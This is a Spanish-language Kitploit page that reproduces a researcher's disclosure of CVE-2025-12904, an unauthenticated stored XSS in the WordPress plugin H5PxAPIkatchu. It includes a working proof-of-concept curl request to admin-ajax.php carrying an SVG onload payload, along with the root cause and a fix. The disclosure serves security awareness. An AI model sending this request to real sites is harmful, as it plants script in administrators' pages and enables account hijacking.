Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — Divulgación para CVE-2025-12904 | Kitploit
Herramientas/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Divulgación para CVE-2025-12904

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 8 mesesAún no revisado

Informe de CVE de SNORDIAN's-H5PxAPIkatchu

Divulgación para CVE-2025-12904

CVE-2025-12904 - Vulnerabilidad en SNORDIAN's H5PxAPIkatchu

Este repositorio divulga una vulnerabilidad descubierta en SNORDIAN's H5PxAPIkatchu <= 0.4.16, un plugin de WordPress desarrollado por otacke.

🛠 Versión afectada

  • Producto: SNORDIAN's H5PxAPIkatchu
  • Versión: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 CVE asignado

ID de CVETipoComponenteImpacto
CVE-2025-12904Cross-Site Scripting Almacenado no Autenticado a través de insert_dataclass-table-view.phpAtacante autenticado puede ejecutar JS

🧾 Descripción detallada

CVE-2025-12904 — Cross-Site Scripting Almacenado no Autenticado a través de insert_data

  • Componente afectado: página de administración de h5pxapikatchu
  • Vector de ataque: No autenticado mediante solicitud POST
  • Desencadenante: Un atacante puede inyectar scripts maliciosos en la interfaz de administración explotando la acción insert_data para almacenar scripts arbitrarios.
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※Si el id dentro del objeto no existe, fallará.

  • Impacto: Los scripts almacenados pueden ejecutarse, lo que supone un riesgo de daños graves como el secuestro de cuentas.

❓Razón de la vulnerabilidad

La función insert_data() no realizaba ninguna comprobación de permisos, lo que permitía guardar entradas maliciosas sin autenticación. Además, estas entradas se mostraban sin escapar en la interfaz de administración.

  • La función insert_data() utiliza current_user_can para evitar la ejecución no autorizada.
  • Al usar esc_html($value) en lugar de echo $value, se puede prevenir la ejecución de XSS.

Nota

Fue muy difícil crear el PoC.

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

Me tomó mucho tiempo reproducir esta parte. Quiero mejorar en el uso del comando curl. Y además, este plugin... ¿está bien en varios aspectos? Especialmente el nombre, y tal.

🔍 Descubridor

Nombre: MooseLove
Rol: Investigador de seguridad independiente / cazador de bugs
Contacto: Disponible bajo solicitud


📚 Referencias

  • Producto: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ Licencia

Este aviso se proporciona para la concienciación pública sobre seguridad. Libre para compartir con atribución.

Descargar herramienta